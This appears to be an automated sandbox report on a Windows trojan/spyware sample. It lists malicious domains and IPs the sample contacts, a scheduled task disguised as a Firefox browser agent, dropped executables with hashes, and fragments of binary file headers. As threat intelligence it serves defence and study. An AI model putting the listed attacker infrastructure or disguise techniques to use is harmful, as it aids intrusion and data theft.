54.38.220.85	unicupload.top	France	16276	OVHFR	true
211.169.6.249	amogohuigotuli.at	Korea Republic of	3786	LGDACOMLGDACOMCorporationKR	true
175.126.109.15	unknown	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	false
162.159.130.233	cdn.discordapp.com	United States	13335	CLOUDFLARENETUS	false
185.233.81.115	unknown	Russian Federation	50113	SUPERSERVERSDATACENTERRU	true
185.7.214.171	unknown	France	42652	DELUNETDE	false
211.119.84.112	unknown	Korea Republic of	3786	LGDACOMLGDACOMCorporationKR	false
47.251.44.201	host-data-coin-11.com	United States	45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	true
67.199.248.14	bitly.com	United States	396982	GOOGLE-PRIVATE-CLOUDUS	false
187.232.210.249	unknown	Mexico	8151	UninetSAdeCVMX	false
185.186.142.166	unknown	Russian Federation	204490	ASKONTELRU	true
67.199.248.10	bit.ly	United States	396982	GOOGLE-PRIVATE-CLOUDUS	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	549822
Start date:	09.01.2022
Start time:	18:46:09
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 9s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	cz2ZyeL2Zd.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	45
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@37/25@67/15
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 34.8% (good quality ratio 20.5%) Quality average: 40.2% Quality standard deviation: 39.2%
HCA Information:	Successful, ratio: 89% Number of executed functions: 143 Number of non-executed functions: 161
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information. Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, consent.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 23.54.113.53, 23.213.168.66, 20.54.110.249, 40.91.112.76 Excluded domains from analysis (whitelisted): displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, patmushta.info, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, mstdn.social, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtEnumerateKey calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
18:47:37	Task Scheduler	Run new task: Firefox Default Browser Agent 601E7BF4EE0C1906 path: C:\Users\user\AppData\Roaming\icgujuh
18:47:47	API Interceptor	7x Sleep call for process: svchost.exe modified
18:48:02	API Interceptor	1x Sleep call for process: EC9F.exe modified
18:48:07	API Interceptor	1x Sleep call for process: MpCmdRun.exe modified
18:48:24	Task Scheduler	Run new task: Firefox Default Browser Agent 084281722AA6EB4E path: C:\Users\user\AppData\Roaming\ecgujuh

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
188.166.28.199	826hJ4N94K.exe	Get hash	malicious	Browse
	XrXNyZO97R.exe	Get hash	malicious	Browse
	8MhVRerFFi.exe	Get hash	malicious	Browse
	9lQMy4agvt.exe	Get hash	malicious	Browse
	7NAzyCWRyM.exe	Get hash	malicious	Browse
	vndc66e29u.exe	Get hash	malicious	Browse
	meuaL0hjiF.exe	Get hash	malicious	Browse
	T5dzWoyBkt.exe	Get hash	malicious	Browse
	yoi1hLt6Yg.exe	Get hash	malicious	Browse
	fiWSY3kPgj.exe	Get hash	malicious	Browse
	EIYeUMMU25.exe	Get hash	malicious	Browse
	S1DD8E0uYz.exe	Get hash	malicious	Browse
	ZD61j6wVG0.exe	Get hash	malicious	Browse
	b8kfqLR6Yy.exe	Get hash	malicious	Browse
	ZmrIkplkoM.exe	Get hash	malicious	Browse
	mBtzHyN7TT.exe	Get hash	malicious	Browse
	UYHSdgPlrz.exe	Get hash	malicious	Browse
	zIMrfkEec8.exe	Get hash	malicious	Browse
	H5wKkYHgfH.exe	Get hash	malicious	Browse
	QAy9Baa1GV.exe	Get hash	malicious	Browse
148.0.74.229	826hJ4N94K.exe	Get hash	malicious	Browse	amogohuigotuli.at/
	8MhVRerFFi.exe	Get hash	malicious	Browse	amogohuigotuli.at/
	y36GDDP7kG.exe	Get hash	malicious	Browse	melchen-testet.at/upload/
	eW09XNraFg.exe	Get hash	malicious	Browse	amogohuigotuli.at/
	8T2N3B1e3s.exe	Get hash	malicious	Browse	amogohuigotuli.at/
	fw8ex1BNek.exe	Get hash	malicious	Browse	rcacademy.at/upload/
	PQ1OaewSX4.exe	Get hash	malicious	Browse	rcacademy.at/upload/
	lepdHVzKGs.exe	Get hash	malicious	Browse	rcacademy.at/upload/
	5bur7zjf4Y.exe	Get hash	malicious	Browse	rcacademy.at/upload/
	x24rbSAOOx.exe	Get hash	malicious	Browse	rcacademy.at/upload/
	lqzq58DLHP.exe	Get hash	malicious	Browse	srtuiyhuali.at/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
unicupload.top	826hJ4N94K.exe	Get hash	malicious	Browse	54.38.220.85
	XrXNyZO97R.exe	Get hash	malicious	Browse	54.38.220.85
	8MhVRerFFi.exe	Get hash	malicious	Browse	54.38.220.85
	9lQMy4agvt.exe	Get hash	malicious	Browse	54.38.220.85
	7NAzyCWRyM.exe	Get hash	malicious	Browse	54.38.220.85
	vndc66e29u.exe	Get hash	malicious	Browse	54.38.220.85
	meuaL0hjiF.exe	Get hash	malicious	Browse	54.38.220.85
	T5dzWoyBkt.exe	Get hash	malicious	Browse	54.38.220.85
	yoi1hLt6Yg.exe	Get hash	malicious	Browse	54.38.220.85
	fiWSY3kPgj.exe	Get hash	malicious	Browse	54.38.220.85
	EIYeUMMU25.exe	Get hash	malicious	Browse	54.38.220.85
	S1DD8E0uYz.exe	Get hash	malicious	Browse	54.38.220.85
	ZD61j6wVG0.exe	Get hash	malicious	Browse	54.38.220.85
	b8kfqLR6Yy.exe	Get hash	malicious	Browse	54.38.220.85
	ZmrIkplkoM.exe	Get hash	malicious	Browse	54.38.220.85
	mBtzHyN7TT.exe	Get hash	malicious	Browse	54.38.220.85
	UYHSdgPlrz.exe	Get hash	malicious	Browse	54.38.220.85
	zIMrfkEec8.exe	Get hash	malicious	Browse	54.38.220.85
	H5wKkYHgfH.exe	Get hash	malicious	Browse	54.38.220.85
	QAy9Baa1GV.exe	Get hash	malicious	Browse	54.38.220.85
amogohuigotuli.at	826hJ4N94K.exe	Get hash	malicious	Browse	91.139.196.113
	XrXNyZO97R.exe	Get hash	malicious	Browse	211.169.6.249
	8MhVRerFFi.exe	Get hash	malicious	Browse	179.177.56.254
	9lQMy4agvt.exe	Get hash	malicious	Browse	110.14.121.123
	vndc66e29u.exe	Get hash	malicious	Browse	95.104.121.111
	yoi1hLt6Yg.exe	Get hash	malicious	Browse	183.78.205.92
	ZmrIkplkoM.exe	Get hash	malicious	Browse	115.91.217.231
	zIMrfkEec8.exe	Get hash	malicious	Browse	183.78.205.92
	H5wKkYHgfH.exe	Get hash	malicious	Browse	109.98.58.98
	nkINykHreE.exe	Get hash	malicious	Browse	152.0.118.227
	u5Xy31KyGy.exe	Get hash	malicious	Browse	181.129.180.251
	415XfKapA1.exe	Get hash	malicious	Browse	186.6.244.121
	1k1npeff0u.exe	Get hash	malicious	Browse	201.124.33.166
	EBMf8S7hP1.exe	Get hash	malicious	Browse	121.136.102.4
	8hTt1UXc6d.exe	Get hash	malicious	Browse	115.91.217.231
	Pc068pnLY4.exe	Get hash	malicious	Browse	115.91.217.231
	9vl0t7ohyv.exe	Get hash	malicious	Browse	187.232.181.140

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
DIGITALOCEAN-ASNUS	826hJ4N94K.exe	Get hash	malicious	Browse	188.166.28.199
	XrXNyZO97R.exe	Get hash	malicious	Browse	188.166.28.199
	8MhVRerFFi.exe	Get hash	malicious	Browse	188.166.28.199
	9lQMy4agvt.exe	Get hash	malicious	Browse	188.166.28.199
	Odeme detaylari 08012022.xls	Get hash	malicious	Browse	138.68.167.254
	ertpl_4.0.apk	Get hash	malicious	Browse	128.199.97.77
	purdue_corporate_integrity_agreement 25553 .js	Get hash	malicious	Browse	138.197.222.36
	sample_utah_prenuptial_agreement 63213 .js	Get hash	malicious	Browse	138.197.222.36
	AMONG US HACK.exe	Get hash	malicious	Browse	178.62.127.193
	how_to_fill_out_a_nebraska_residential_purchase_agreement 22260 .js	Get hash	malicious	Browse	138.197.222.36
	Erickson-3UH7-NPWA0E-YJS0.htm	Get hash	malicious	Browse	138.68.90.169
	Ocxwgtrrxrnbohidoxavjksseafwerivek.exe	Get hash	malicious	Browse	128.199.177.119
	fedex_documentos00.PDF.exe	Get hash	malicious	Browse	167.99.241.151
	hMp9WEkOqi.exe	Get hash	malicious	Browse	178.128.172.1
	voice_changer.exe	Get hash	malicious	Browse	159.203.66.51
	SOA 07.01.2022.xlsx	Get hash	malicious	Browse	178.128.172.1
	psiphon3.exe	Get hash	malicious	Browse	104.236.161.80
	hBrgz6JniB.exe	Get hash	malicious	Browse	178.62.127.193
	5vWJ6NI60h	Get hash	malicious	Browse	165.23.71.91
	sigXcEjuPZ.exe	Get hash	malicious	Browse	178.62.127.193
CompaniaDominicanadeTelefonosSADO	826hJ4N94K.exe	Get hash	malicious	Browse	148.0.74.229
	32KUOKBgfN	Get hash	malicious	Browse	150.10.192.70
	8MhVRerFFi.exe	Get hash	malicious	Browse	148.0.74.229
	arm7	Get hash	malicious	Browse	148.176.105.99
	UZAyUa3HYs	Get hash	malicious	Browse	148.23.183.158
	kRy0R9mhYX	Get hash	malicious	Browse	148.38.214.158
	0VmrIEbBGo	Get hash	malicious	Browse	152.0.153.88
	iO034oxekv	Get hash	malicious	Browse	152.155.15.219
	y36GDDP7kG.exe	Get hash	malicious	Browse	148.0.74.229
	a2lzHiNAYQ	Get hash	malicious	Browse	148.42.12.131
	DP035lJwIY	Get hash	malicious	Browse	150.72.126.248
	nkINykHreE.exe	Get hash	malicious	Browse	152.0.118.227
	HEkMILuJTB	Get hash	malicious	Browse	148.26.55.0
	arm	Get hash	malicious	Browse	148.180.79.45
	kKRcFyvuGE	Get hash	malicious	Browse	152.0.83.67
	sora.arm7	Get hash	malicious	Browse	148.42.239.161
	sora.arm	Get hash	malicious	Browse	190.80.148.111
	uK9IVzZB9G	Get hash	malicious	Browse	148.176.130.40
	o0MOd8gheD	Get hash	malicious	Browse	148.45.161.85
	x86	Get hash	malicious	Browse	150.92.186.163

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ce5f3254611a8c095a3d821d44539877	149_setupInstaller.exe	Get hash	malicious	Browse	67.199.248.14 162.159.130.233 67.199.248.10
	826hJ4N94K.exe	Get hash	malicious	Browse	67.199.248.14 162.159.130.233 67.199.248.10
	fortnite hack.exe	Get hash	malicious	Browse	67.199.248.14 162.159.130.233 67.199.248.10
	XrXNyZO97R.exe	Get hash	malicious	Browse	67.199.248.14 162.159.130.233 67.199.248.10
	FortMod 8.5.exe	Get hash	malicious	Browse	67.199.248.14 162.159.130.233 67.199.248.10
	Setup.exe	Get hash	malicious	Browse	67.199.248.14 162.159.130.233 67.199.248.10
	M1pOSw9W3L.exe	Get hash	malicious	Browse	67.199.248.14 162.159.130.233 67.199.248.10
	8MhVRerFFi.exe	Get hash	malicious	Browse	67.199.248.14 162.159.130.233 67.199.248.10
	0f6qRXCeu8.exe	Get hash	malicious	Browse	67.199.248.14 162.159.130.233 67.199.248.10
	Antiban.exe	Get hash	malicious	Browse	67.199.248.14 162.159.130.233 67.199.248.10
	1LkNyfChDX.exe	Get hash	malicious	Browse	67.199.248.14 162.159.130.233 67.199.248.10
	9lQMy4agvt.exe	Get hash	malicious	Browse	67.199.248.14 162.159.130.233 67.199.248.10
	AalEmfZesE.exe	Get hash	malicious	Browse	67.199.248.14 162.159.130.233 67.199.248.10
	ZwI3vqBgzr.exe	Get hash	malicious	Browse	67.199.248.14 162.159.130.233 67.199.248.10
	QGyLUbk26P.exe	Get hash	malicious	Browse	67.199.248.14 162.159.130.233 67.199.248.10
	UEr7f6waGM.exe	Get hash	malicious	Browse	67.199.248.14 162.159.130.233 67.199.248.10
	Genshin FREE Cheat v 2.1.exe	Get hash	malicious	Browse	67.199.248.14 162.159.130.233 67.199.248.10
	GenshinHack.exe	Get hash	malicious	Browse	67.199.248.14 162.159.130.233 67.199.248.10
	Setup.exe	Get hash	malicious	Browse	67.199.248.14 162.159.130.233 67.199.248.10
	GENSHIN.exe	Get hash	malicious	Browse	67.199.248.14 162.159.130.233 67.199.248.10
8916410db85077a5460817142dcbc8de	826hJ4N94K.exe	Get hash	malicious	Browse	185.233.81.115
	XrXNyZO97R.exe	Get hash	malicious	Browse	185.233.81.115
	8MhVRerFFi.exe	Get hash	malicious	Browse	185.233.81.115
	9lQMy4agvt.exe	Get hash	malicious	Browse	185.233.81.115
	7NAzyCWRyM.exe	Get hash	malicious	Browse	185.233.81.115
	vndc66e29u.exe	Get hash	malicious	Browse	185.233.81.115
	meuaL0hjiF.exe	Get hash	malicious	Browse	185.233.81.115
	T5dzWoyBkt.exe	Get hash	malicious	Browse	185.233.81.115
	kgheowd.dll	Get hash	malicious	Browse	185.233.81.115
	34CCAE63B50259B758A5B68F579077E5152D9568CD1F9.exe	Get hash	malicious	Browse	185.233.81.115
	JkcAWRq2fK.exe	Get hash	malicious	Browse	185.233.81.115
	vUjcHAyk52.dll	Get hash	malicious	Browse	185.233.81.115
	ebw1Vxeew7.dll	Get hash	malicious	Browse	185.233.81.115
	Google.dll	Get hash	malicious	Browse	185.233.81.115
	ZGPQ2CJpw2.dll	Get hash	malicious	Browse	185.233.81.115
	Fm9bT1UlKI.exe	Get hash	malicious	Browse	185.233.81.115
	LaicMpixgy.exe	Get hash	malicious	Browse	185.233.81.115
	daleUmOAcZ.exe	Get hash	malicious	Browse	185.233.81.115
	lAx2rypDqG.exe	Get hash	malicious	Browse	185.233.81.115
	oSI9rf0h2U.exe	Get hash	malicious	Browse	185.233.81.115

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\5D68.exe	826hJ4N94K.exe	Get hash	malicious	Browse
	XrXNyZO97R.exe	Get hash	malicious	Browse
	8MhVRerFFi.exe	Get hash	malicious	Browse
	9lQMy4agvt.exe	Get hash	malicious	Browse
	7NAzyCWRyM.exe	Get hash	malicious	Browse
	vndc66e29u.exe	Get hash	malicious	Browse
	meuaL0hjiF.exe	Get hash	malicious	Browse
	T5dzWoyBkt.exe	Get hash	malicious	Browse
	yoi1hLt6Yg.exe	Get hash	malicious	Browse
	fiWSY3kPgj.exe	Get hash	malicious	Browse
	EIYeUMMU25.exe	Get hash	malicious	Browse
	S1DD8E0uYz.exe	Get hash	malicious	Browse
	ZD61j6wVG0.exe	Get hash	malicious	Browse
	b8kfqLR6Yy.exe	Get hash	malicious	Browse
	ZmrIkplkoM.exe	Get hash	malicious	Browse
	mBtzHyN7TT.exe	Get hash	malicious	Browse
	UYHSdgPlrz.exe	Get hash	malicious	Browse
	zIMrfkEec8.exe	Get hash	malicious	Browse
	H5wKkYHgfH.exe	Get hash	malicious	Browse
	QAy9Baa1GV.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\1F0B.exe	826hJ4N94K.exe	Get hash	malicious	Browse
	XrXNyZO97R.exe	Get hash	malicious	Browse
	8MhVRerFFi.exe	Get hash	malicious	Browse
	9lQMy4agvt.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\1F0B.exe.log Download File
Process:	C:\Users\user\AppData\Local\Temp\1F0B.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	700
Entropy (8bit):	5.346524082657112
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhat/DLI4M/DLI4M0kvoDLIw:ML9E4Ks2wKDE4KhK3VZ9pKhgLE4qE4jv
MD5:	65CF801545098D915A06D8318D296A01
SHA1:	456149D5142C75C4CF74D4A11FF400F68315EBD0
SHA-256:	32E502D76DBE4F89AEE586A740F8D1CBC112AA4A14D43B9914C785550CCA130F
SHA-512:	4D1FF469B62EB5C917053418745CCE4280052BAEF9371CAFA5DA13140A16A7DE949DD1581395FF838A790FFEBF85C6FC969A93CC5FF2EEAB8C6C4A9B4F1D552D
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..

C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.11002781241816798
Encrypted:	false
SSDEEP:	12:26XMXm/Ey6q9995NA0Rq3qQ10nMCldimE8eawHjcX:26Fl68oNLyMCldzE9BHjcX
MD5:	04ACF890620B455E3D8105F006EDC27D
SHA1:	C8990B66B7BC39A617B985EE031B42056CF048BF
SHA-256:	C280F7895D546EB10119F5BC171DA014D19E8FC01BAA9E09F5921DE83F232410
SHA-512:	4B144D9686F39D598B42A2E6E939D6D2B783A5C47C29D63345E2725C941124A70FB91B189D429291CBB3444B21C8E2E227C1B868C45B9605AD9ED388CCE226AC
Malicious:	false
Preview:	....................................................................................8......-.....................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................Cr.4...... .....LJ.Y............S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.....8...=!.-....................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.11254562368410817
Encrypted:	false
SSDEEP:	12:LxXm/Ey6q9995NA0H1miM3qQ10nMCldimE8eawHza1miI4:Lcl68o21tMLyMCldzE9BHza1tI4
MD5:	E1602F0FC5E7DA52892D1B6DE410B9A9
SHA1:	070382E305B8CBB7BA784ED0C1682249074DB50F
SHA-256:	76E28ADA25C70D6B407A35AB53E4F19713833889FA782024489F6A70C747839B
SHA-512:	588D9A53C70BB03667B5E65072D6B714A23E53D3F037EA56A3AC831B876C274B4B80D2A40ED0488A704326E6B430557DF776541513CB568B9A86D351634B3A49
Malicious:	false
Preview:	....................................................................................8...s..-.....................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................Cr.4...... .......Y............U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P.....8...4!.-....................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.1125133223520602
Encrypted:	false
SSDEEP:	12:QXm/Ey6q9995NA0H1mK2P3qQ10nMCldimE8eawHza1mKel/N:Bl68o21iPLyMCldzE9BHza16ll
MD5:	ADC67E7CB7FBEE4EC3A91C2EB164F74C
SHA1:	5E0C28A169D23141F9879BF613C3EE9F77BFEABE
SHA-256:	ECDCC2B8EE5017173B1300598BD62778321EE8A0652EB44B44CA06F5C581E286
SHA-512:	00047EE56DCF8DA14BFB5742F25E91391799A82A835C6485D84EEDF12C447C30E0E161F5D85FB1EF529BAEAC6536A297E950D2F59A8C3CAF7017DE70304FDB4D
Malicious:	false
Preview:	....................................................................................8...G.-.....................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................Cr.4...... .......Y............U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P.....8.....-....................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1F0B.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	537600
Entropy (8bit):	5.844135333711694
Encrypted:	false
SSDEEP:	12288:tkF5gre7Aqs0G+L6QTvK5SzAz1wNlMc0dK0thx1IvIRMSw+Vw:tkFOozs826lHGw
MD5:	9C40DF5E45E0C3095F7B920664A902D3
SHA1:	795049F091E0D3A31E7B9C1091BD62BED71FB62E
SHA-256:	7AFBFF30F47AB9D8E3FC2B67A72453161B93424F680C0CAF270A57E05DD2478B
SHA-512:	7C7DA0D86EF8FF09F63D0B63812149BBB9482075547814739B1BF3211B8DF4EB366FD9EE735907CF7946ADA77479771422904A2BD121839EAEBB33B431805EEB
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 43%, Browse Antivirus: ReversingLabs, Detection: 67%
Joe Sandbox View:	Filename: 826hJ4N94K.exe, Detection: malicious, Browse Filename: XrXNyZO97R.exe, Detection: malicious, Browse Filename: 8MhVRerFFi.exe, Detection: malicious, Browse Filename: 9lQMy4agvt.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...(................0..,...........J... ...`....@.. ....................................@..................................I..K....`............................................................................... ............... ..H............text...$... ...,.................. ..`.rsrc........`......................@....reloc...............2..............@..B.................J......H.......x...T?...........V...............................................(......0..1.......8"....~....u....s....z&8.........8....(c...8......................................(c...(.......j................................(......(....8....(.........8....(....8..................................................0..............0...................................(......0.....................0..............(....t.A.........t.A.......................*.......

C:\Users\user\AppData\Local\Temp\2B8.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	316416
Entropy (8bit):	5.297174692267813
Encrypted:	false
SSDEEP:	6144:L+PGLoNMSVhurBV87Xj3Y7uNJhuzbgwuJ2:RMNM4IL87Xgu7hunnb
MD5:	4738BD2D6F3E4DA081AF0A2218E21C37
SHA1:	398BEE71688BD29A6B02957E77145378E0ACDD58
SHA-256:	8B93F57937B9BF11EE356B6C7A836A1BB8D730E2B22D1EF84A4A1BC8F316707F
SHA-512:	8C8E23F5B54A94E5DACACE9A373FBBAB08E79C85A25B3E9D224C05E9B5187F43D0CDFA77A0F72C64E9761401482C8522AF7B676DE1D7F276C746322B02AF5814
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......8f..\|...\|...\|...bU$.W...bU5.a...bU#.....[..y...\|.......bU*.}...bU4.}...bU1.}...Rich\|...........PE..L......`......................w.............. ....@..........................0x..............................................^..<....0w..............................!..............................xU..@............ ...............................text............................... ..`.rdata..dG... ...H..................@..@.data.....s..p.......V..............@....rsrc........0w.....................@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\5D68.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	358912
Entropy (8bit):	6.278717191933335
Encrypted:	false
SSDEEP:	6144:7e+RhbrOOFh9v2Y8zBk3L3gXO1RdFggj:7e6aOFhB8zBk3L3b1R
MD5:	1F935BFFF0F8128972BC69625E5B2A6C
SHA1:	18DB55C519BBE14311662A06FAEECC97566E2AFD
SHA-256:	2BFA0884B172C9EAFF7358741C164F571F0565389AB9CF99A8E0B90AE8AD914D
SHA-512:	2C94C1EA43B008CE164D7CD22A2D0FF3B60A623017007A2F361BDFF69ED72E97B0CC0897590BE9CC56333E014CD003786741EB6BB7887590CB2AAD832EA8A32D
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 37%, Browse Antivirus: ReversingLabs, Detection: 86%
Joe Sandbox View:	Filename: 826hJ4N94K.exe, Detection: malicious, Browse Filename: XrXNyZO97R.exe, Detection: malicious, Browse Filename: 8MhVRerFFi.exe, Detection: malicious, Browse Filename: 9lQMy4agvt.exe, Detection: malicious, Browse Filename: 7NAzyCWRyM.exe, Detection: malicious, Browse Filename: vndc66e29u.exe, Detection: malicious, Browse Filename: meuaL0hjiF.exe, Detection: malicious, Browse Filename: T5dzWoyBkt.exe, Detection: malicious, Browse Filename: yoi1hLt6Yg.exe, Detection: malicious, Browse Filename: fiWSY3kPgj.exe, Detection: malicious, Browse Filename: EIYeUMMU25.exe, Detection: malicious, Browse Filename: S1DD8E0uYz.exe, Detection: malicious, Browse Filename: ZD61j6wVG0.exe, Detection: malicious, Browse Filename: b8kfqLR6Yy.exe, Detection: malicious, Browse Filename: ZmrIkplkoM.exe, Detection: malicious, Browse Filename: mBtzHyN7TT.exe, Detection: malicious, Browse Filename: UYHSdgPlrz.exe, Detection: malicious, Browse Filename: zIMrfkEec8.exe, Detection: malicious, Browse Filename: H5wKkYHgfH.exe, Detection: malicious, Browse Filename: QAy9Baa1GV.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......k..S/.../.../...1.Z.=...1.L.W....6..*.../.......1.K.....1.[.....1.^.....Rich/...................PE..L...t..`.................<...J.......4.......P....@.................................A.......................................,9..<....0...Y.......................#..P...............................X...@............................................text...4:.......<.................. ..`.data...`....P.......@..............@....pamicak............................@....dos....K...........................@....modav..............................@....nugirof..... ......................@....rsrc....Y...0...Z..................@..@.reloc...>.......@...:..............@..B................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\8FB8.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2030423
Entropy (8bit):	6.581224020190253
Encrypted:	false
SSDEEP:	24576:hZ7Xar2VsBq/OebTdhbj8C2cBiw9PVf7x3Tszozbaw2pYqZEWzMdX3UdN9RdN:NswfblVPZv32pYqZ3aUdjRdN
MD5:	AA519DEEB511E886E73F8E0256180800
SHA1:	653B5155ABD17EB35F13543EED5F3A0794000171
SHA-256:	B8EDF8B69FD72F728790CAC7FA5F2642A5C386EEC1ACE836CD05A19177252E2B
SHA-512:	6156B3391118A458130C6FF6FE8B0B0B05895B16E8B43C6A269C4D5A9136BB622E3AEC6B13C1D397C00642A82563A830D43CAB48D6BC7824090BB7174C65D428
